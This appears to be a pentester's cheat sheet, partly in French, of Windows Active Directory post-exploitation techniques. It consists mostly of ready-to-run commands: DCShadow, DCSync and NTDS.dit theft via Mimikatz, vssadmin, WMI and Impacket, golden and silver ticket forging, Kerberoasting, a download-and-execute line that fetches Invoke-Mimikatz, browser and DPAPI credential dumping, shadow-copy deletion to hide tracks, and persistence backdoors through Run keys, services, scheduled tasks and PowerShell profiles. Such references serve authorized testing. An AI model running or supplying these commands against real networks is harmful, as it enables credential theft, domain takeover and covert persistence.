Post exploitation techniques
DC SHADOW
# DC Shadow is a post compromission attack, allowing you to update replication metadata
# On a compromised client, using a domain admin account
# You can attack with Mimikatz
# Terminal 1 (runas)
mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:dtargaryen /attribute:description /value:"The Game" /replOriginatingUid:{00000000-0000-0000-0000-000000000000} /replOriginatingTime:"2017-01-01 09:00:00" /replOriginatingUsn:42
# Terminal 2 (runas)
mimikatz # lsadump::dcshadow /push
# You can check the success throught repadmin on the DC
repadmin /showobjmeta DC01.NORZH.LAN "CN=Daenerys Targaryen,CN=Users,DC=NORZH,DC=LAN"
NTDS database
# Initial location of the NTDS database on the domain controller
C:\WindowsTDSTDS.dit
# Step 1 → Finding a way to get the NDTS.dis and SYSTEM file
# Step 2 → Crack/Analyze offline
Local Extraction
VSSadmin
# Récupération via VSSadmin
# Create a Volume Shadow Copy
C:\Windows\system32> vssadmin create shadow /for=C:
# Retrieve NTDS from the copy
C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windowstdstds.dit c:\Extracttds.dit
# Copy SYSTEM file
C:\Windows\system32> reg SAVE HKLM\SYSTEM c:\Extract\SYS
C:\Windows\system32> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM c:\Extract\SYSTEM
# Delete tracks
C:\Windows\system32> vssadmin delete shadows /shadow={uuid}
# Trick if you are on a semi-interactive shell
# You can specify /quiet option to not get the prompt
# Can be usefull for deletion (as it require to confirm)
vssadmin delete shadows /shadow={uuid} /quiet
ntdsutil tool
# ntdsutil is a builtin tool used to manage the AD
# You can abuse it and create a backup of the ntds.dit file
ntdsutil
activate instance ntds
ifm
create full C:tdsutil
quit
quit
DC Sync / Mimikatz
# DC Sync is a less noisy way to extract users informations
# It uses the DRS (Directory Replication Service)
# Classic
mimikatz # lsadump::dcsync /domain:domain.lan /all /csv
# Specific user
mimikatz # lsadump::dcsync /domain:domain.lan /user:test
PowerSploit
# PowerSploit contains a script using the volume shadow copy service
Import-Module .\VolumeShadowCopyTools.ps1
New-VolumeShadowCopy -Volume C:\
Get-VolumeShadowCopy
# Also possible through a meterpreter session
powershell_shell
New-VolumeShadowCopy -Volume C:\
Get-VOlumeShadowCopy
Invoke-DCSync
# Powershell script
# Leverages PowerView, Invoke-ReflectivePEInjection and a DLL wrapper of PowerKatz
Invoke-DCSync
# Get other format (user:id:lm:ntlm)
Invoke-DCSync -PWDumpFormat
# It is also possible through a meterpreter session
Nishang
# Nishang is a post exploitation framework allowing attacker to perform attacks
# You can use the Copy-VSS script to get NTDS.dit, SAM and SYSTEM files
Import-Module .\Copy-VSS.ps1
Copy-VSS
Copy-VSS -DestinationDir C:\ShadowCopy\
# You can also use them throught a meterpretrer session by loading the powershell extension
load powershell
powershell_import /root/Copy-VSS.ps1
powershell_execute Copy-VSS
# Also possible to establish a direct connection
powershell_shell
PS > Copy-VSS
PS > Copy-VSS -DestinationDir C:inja
Remote Extraction
CrackMapExec
crackmapexec xxx.xxx.xxx.xxx -u login -p password -d domain --ntds drsuapi
WMI - Remote
# It is possible to remotely extract the NTDS database using WMI and VSSADMIN
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
Impacket
$ python secretsdump.py -history -user-status -just-dc-user Administrateur -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
$ python secretsdump.py -history -user-status -just-dc-user krbtgt -just-dc-ntlm foo.local/administrateur:P4ssw0rd\!@DC1.FOO.LOCAL
NTDS Extraction and analysis
# Impacket provides a usefull script to do that (decrypt copied files)
impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit DOMAIN
# Also possible to dump it remotely by using the computer account and its hash
impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
# Extraction is also possible using NTDSDumpEx
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
# Or adXtract
./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab
Empire
# Empire has 2 modules you can use to retrieve hashes through DCSync
usemodule credentials/mimikatz/dcsync_hashdump
usemodule credentials/mimikatz/dcsync
Ticket generation from Linux
# Generate a ticket or convert it (kekeo) to ccache format
$ ticketer.py -nthash <hash> -domain-sid <sid> -domain <domain> <user>
# Export the path in the right variable
$ export KRB5CCNAME=/tmp/ticket.ccache
$ klist
# Exec and use the ticket
$ /impacket/examples/psexec.py -k -n -debug DOMAIN/user@host
# Dump NTDS
$ proxychains secretsdump.py -k -no-pass qsec@DCFIL.PRAMAFIL.CORP -use-vss
Golden Ticket
# Golden Ticket
> Nom du compte administrateur (Administrateur)
> Nom complet du domaine (domain.local)
> SID du domaine (S-1-5-21-1723555596-1415287819-2705645101) [whoami /user]
> Hash NTLM du compte krbtgt (6194bd1a5bf3ecd542e8aac9860bddf0)
mimikatz # privilege:debug
mimikatz # lsadump::lsa /inject /name:krbtgt
mimikatz # kerberos::golden /admin:Administrateur /domain:domain.local /sid:S-1-5-21-1723555596-1415287819-2705645101 /krbtgt:6194bd1a5bf3ecd542e8aac9860bddf0 /ticket:domain.local.kirbi /id:500 /ptt
Use :
mimikatz # kerberos::ptt domain.local.kirbi
mimikatz # kerberos::list
# Resource
https://twitter.com/mpgn_x64/status/1241688547037532161
# Golden ticket and access denied ?
# from cmd (elevated)
> mimikatz kerberos::golden
> klist add_bind <DOMAIN> <DC>
> psexec \\dc\ cmd
Playing with tickets on Windows
# Sessions en cours
mimikatz # sekurlsa::logonpasswords
# Ticket TGT
# Dump SPN
PS C:\> Find-PSServiceAccounts -DumpSPN
Discovering service account SPNs in the AD Domain foo.local
svcSQLServ/pc1.foo.local:1433
# Download Mimikatz
PS C:\> Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
PS C:\> Invoke-Mimikatz
mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
# Lister les tickets actifs ou les purger
PS C:\> Invoke-Mimikatz -Command '"kerberos::purge"'
PS C:\> Invoke-Mimikatz -Command '"kerberos::list"'
PS C:\> klist
# Demander un ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "svcSQLServ/pc1.foo.local:1433"
# Exporter un ticket
mimikatz # kerberos::list /export
# Crack Ticket
python tgsrepcrack.py wordlist.txt ticket.kirbi
Tips
# Getting passwords from browser memory
procdump.exe -ma firefox_pid
strings.exe firefox.dmp | findstr /i "Passwd="
Scavenger
# Scavenger is a tool used above CrackMapExec to automate the process
# of looking for sensitive files and informations during Internal Pentest
python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local
$ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite
WinSCP
# WinSCP is potentially exploitable in the registry if not using a master password
# You can manually request the key
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2"
reg.exe query "HKEY_CURRENT_USER\Software\Martin Prikry\WinSCP 2\Sessions\username@ip"
# Then let s recover the password using the following binary
https://github.com/anoopengineer/winscppasswd/releases
.\winscppasswd ip user
# Automatisation using CrackMapExec
# Using invoke_sessiongopher you can recover informations about PuTTY, WinSCP, FileZilla, SuperPuTTY or RDP
crackmapexec smb ip -u "user" -p "password" -d "domain" -M invoke_sessiongopher
Snaffler
https://github.com/SnaffCon/Snaffler
# Snaffler is a tool made to automate information gathering on windows and domains
# it focuses location such as network shares etc.
snaffler.exe -s -o snaffler.log
-o Enables outputting results to a file. You probably want this if youre not using -s. e.g. -o C:\usershing\snaffler.log
-s Enables outputting results to stdout as soon as theyre found. You probably want this if you re not using -o.
-v Controls verbosity level, options are Trace (most verbose), Debug (less verbose), Info (less verbose still, default), and Data (results only). e.g -v debug
-m Enables and assigns an output dir for snaffler to automatically take a copy of (or Snaffle... if you will) any found files that it likes.
-l Maximum size of files (in bytes) to Snaffle. Defaults to 10000000, which is about 10MB.
-i Disables computer and share discovery, requires a path to a directory in which to perform file discovery.
-d Domain to search for computers to search for shares on to search for files in. Easy.
-c Domain controller to query for the list of domain computers.
-r The maximum size file (in bytes) to search inside for interesting strings. Defaults to 500k.
-j How many bytes of context either side of found strings in files to show, e.g. -j 200
-z Path to a config file that defines all of the above, and much much more! See below for more details. Give it -z generate to generate a sample config file called .\default.toml.
DonPAPI
https://github.com/login-securite/DonPAPI
# Dumping revelant information on compromised targets without AV detection
# With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.
# Currently gathered info
# - Windows credentials (Taskscheduled credentials & a lot more)
# - Windows Vaults
# - Windows RDP credentials
# - AdConnect (still require a manual operation)
# - Wifi key
# - Intenet explorer Creentials
# - Chrome cookies & credentials
# - Firefox cookies & credentials
# - VNC passwords
# - mRemoteNG password (with default config)
# Classic launch
DonPAPI.py domain/user:passw0rd@target
# Using hash
DonPAPI.py --hashes <LM>:<NT> domain/user@target
# Using Kerberos or local auth
DonPAPI.py -k domain/user@target
DonPAPI.py -local_auth user@target
# If user has LAPS reading privilege
DonPAPI.py -laps domain/user:passw0rd@target
# If you are domain admin, you can dump the domain backup key using impacket
# Then you can use the PVK (backup key) to dump all users secrets
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
PERSISTENCE
Resources
https://rastamouse.me/2018/03/a-view-of-persistence/
Userland & Elevated
# Userland techniques
# HKCU
# Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. (Other keys are available).
Value name: Backdoor
Value data: C:\Usersasta\AppData\Localemp\backdoor.exe
# Start-up
# Create a batch script in the user startup folder.
PS C:\> gc C:\Usersasta\AppDataoaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Usersasta\AppData\Localemp\backdoor.exe
# Scheduled Tasks
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
# Powershell profiles
# You can backdoor the powershell profile
PS C:\> Test-Path $profile
False
PS C:\> New-Item -Path $profile -Type File –Force
Directory: C:\Usersasta\Documents\WindowsPowerShell
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 22/03/2018 12:42 0 Microsoft.PowerShell_profile.ps1
PS C:\> $string = 'Start-Process "cmd.exe"'
PS C:\> $string | Out-File -FilePath "C:\Users\Rasta\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
# Elevated techniques
# HKLM
# Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows
Value name: Backdoor
Value data: C:\Windowsemp\backdoor.exe
# Services
# Create a service that will start automatically or on-demand.
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
# Scheduled Tasks
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
Maintaining Privilege
# Steal passwords and use them with runas
runas /netonly /user:FS01\Administrator cmd
# If you can’t get passwords, use NTLM hashes with techniques such as Pass-the-Hash or psexec.
# Both domain accounts and local accounts can work.
mimikatz> sekurlsa::pth /user:Administrator /domain:FS01 /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt
# Adding new local users can be a method to get back into machines
# Administrators local group is a solution, but you can also use the following groups
Remote Desktop Users
Remote Management Users
Backup Operators
# With the NTLM hash of a computer account, silver tickets can be used to regain local admin privileges via the CIFS service.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /target:fs01 /rc4:47b1d9d581f29b3b43845692bd4a0322 /service:cifs /ptt
# Golden tickets can be used to forge access to any service in the domain.
mimikatz> kerberos::golden /user:Administrator /domain:testlab.local /sid:S-1-5-21-1516486103-3973840447-1748718438 /rc4:9063b8edb3d04ed734edd49e5b0adef3 /ptt
Last updated